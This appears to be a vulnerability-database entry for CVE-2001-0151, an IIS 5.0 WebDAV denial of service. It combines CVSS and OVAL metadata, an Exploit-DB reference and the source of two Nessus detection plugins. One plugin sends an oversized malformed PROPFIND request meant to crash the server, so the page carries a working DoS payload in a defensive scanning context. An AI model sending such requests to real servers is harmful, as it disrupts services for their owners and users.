Vulnerabilities > CVE-2001-0151 - Unspecified vulnerability in Microsoft Internet Information Services 5.0
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
PARTIAL Summary
IIS 5.0 allows remote attackers to cause a denial of service via a series of malformed WebDAV requests.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Exploit-Db
description | Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability. CVE-2001-0151. Dos exploit for windows platform |
id | EDB-ID:20664 |
last seen | 2016-02-02 |
modified | 2001-03-08 |
published | 2001-03-08 |
reporter | Georgi Guninski |
source | https://www.exploit-db.com/download/20664/ |
title | Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability |
Nessus
NASL family Web Servers NASL id IIS_PROPFIND_DOS.NASL description It was possible to disable the remote IIS server by making a specially formed PROPFIND request. last seen 2020-06-01 modified 2020-06-02 plugin id 10631 published 2001-03-08 reporter This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10631 title Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS code # # (C) Tenable Network Security, Inc. # # This security check is heavily based on Georgi Guninski's post # on the bugtraq mailing list include("compat.inc"); if(description) { script_id(10631); script_version ("1.39"); script_cve_id("CVE-2001-0151"); script_bugtraq_id(2453); script_xref(name:"MSKB", value:"291845"); script_xref(name:"MSFT", value:"MS01-016"); script_name(english: "Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS"); script_set_attribute(attribute:"synopsis", value: "The remote web server is vulnerable to a denial of service." ); script_set_attribute(attribute:"description", value: "It was possible to disable the remote IIS server by making a specially formed PROPFIND request." ); script_set_attribute(attribute:"solution", value: "Disable the WebDAV extensions, as well as the PROPFIND method." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-016" ); script_set_attribute(attribute:"plugin_publication_date", value: "2001/03/08"); script_set_attribute(attribute:"vuln_publication_date", value: "2001/03/08"); script_cvs_date("Date: 2018/11/15 20:50:25"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis"); script_end_attributes(); script_summary(english: "Performs a denial of service against IIS"); script_category(ACT_DENIAL); script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl"); script_family(english: "Web Servers"); script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc."); script_require_ports("Services/www", 80); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); function dos(port) { local_var xml, r; xml = '<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="over:"><a:prop><a:displayname /><u:' + crap(128008) + ' /></a:prop></a:propfind>\r\n'; r = http_send_recv3(port: port, item: '/', method: 'PROPFIND', data: xml, add_headers: make_array('Content-Type', 'text/xml') ); } port = get_http_port(default:80); if (http_is_dead(port: port)) exit(0); banner = get_http_banner(port:port); if ("Microsoft-IIS" >!< banner ) exit(0); for (i = 1; i <= 2; i ++) { dos(port:port); sleep(i); } if (http_is_dead(port: port, retry: 3)) security_hole(port);
NASL family Web Servers NASL id IIS_PROPFIND2.NASL description The remote version of the IIS web server contains a bug in its implementation of the WebDAV protocol that could allow an attacker to temporarily disable this service remotely. To exploit this flaw, an attacker would require the ability to send a malformed PROPFIND request to the remote host, although this would not in turn necessarily require authentication. last seen 2020-06-01 modified 2020-06-02 plugin id 10667 published 2001-05-13 reporter This script is Copyright (C) 2001-2018 John Lampe source https://www.tenable.com/plugins/nessus/10667 title Microsoft IIS 5.0 WebDAV Malformed PROPFIND Request Remote DoS code # # This script is based on Georgi Guninski's perl script # ported to NASL by John Lampe <[email protected]> # # See the Nessus Scripts License for details # Changes by Tenable # Add MSKB script_xref (8/29/17) include("compat.inc"); if (description) { script_id(10667); script_version("1.51"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_cve_id("CVE-2001-0151"); script_bugtraq_id(2453); script_xref(name:"MSFT", value:"MS01-016"); script_xref(name:"MSKB", value:"291845"); script_name(english:"Microsoft IIS 5.0 WebDAV Malformed PROPFIND Request Remote DoS"); script_summary(english:"Attempts to crash the Microsoft IIS server"); script_set_attribute(attribute:"synopsis", value:"The remote web server is vulnerable to a denial of service attack."); script_set_attribute(attribute:"description", value: "The remote version of the IIS web server contains a bug in its implementation of the WebDAV protocol that could allow an attacker to temporarily disable this service remotely. To exploit this flaw, an attacker would require the ability to send a malformed PROPFIND request to the remote host, although this would not in turn necessarily require authentication."); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-016"); script_set_attribute(attribute:"solution", value:"Microsoft has released a patch for IIS 5.0."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2001/03/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2001/05/13"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis"); script_end_attributes(); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2001-2020 John Lampe"); script_family(english:"Web Servers"); script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl"); script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("http_func.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); port = get_http_port(default:80, embedded:TRUE); sig = get_kb_item("www/hmap/" + port + "/description"); if (! sig ) sig = get_http_banner(port:port); if ( sig && "IIS/5" >!< sig ) exit(0); if (! get_port_state(port)) exit(0); req = 'OPTIONS / HTTP/1.0\r\n\r\n'; soc = open_sock_tcp(port); if (! soc )exit(0); send(socket:soc, data:req); r = http_recv(socket:soc); close(soc); if (! r ) exit(0); if (!egrep(pattern:"^Allow:.*PROPFIND", string:r) ) exit(0); quote = raw_string(0x22); xml = strcat('<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u=":dav">', '<a:prop><a:displayname /><u:', crap(1025), ' /></a:prop></a:propfind>\r\n\r\n' ); l = strlen(xml); req = string ("PROPFIND / HTTP/1.1\r\n", "Content-type: text/xml\r\n", "Host: ", get_host_name() , "\r\n", "Content-length: ", l, "\r\n\r\n", xml, "\r\n\r\n\r\n"); soc = http_open_socket(port); if(! soc ) exit(0); send(socket:soc, data:req); r = http_recv(socket:soc); http_close_socket(soc); if ( r =~ "HTTP/[0-9.]+ 207 " ) security_warning(port);
Oval
accepted | 2011-05-16T04:03:34.574-04:00 | ||||||||||||||||||||
class | vulnerability | ||||||||||||||||||||
contributors |
| ||||||||||||||||||||
description | IIS 5.0 allows remote attackers to cause a denial of service via a series of malformed WebDAV requests. | ||||||||||||||||||||
family | windows | ||||||||||||||||||||
id | oval:org.mitre.oval:def:90 | ||||||||||||||||||||
status | accepted | ||||||||||||||||||||
submitted | 2003-10-10T12:00:00.000-04:00 | ||||||||||||||||||||
title | IIS Denial of Service via WebDAV | ||||||||||||||||||||
version | 33 |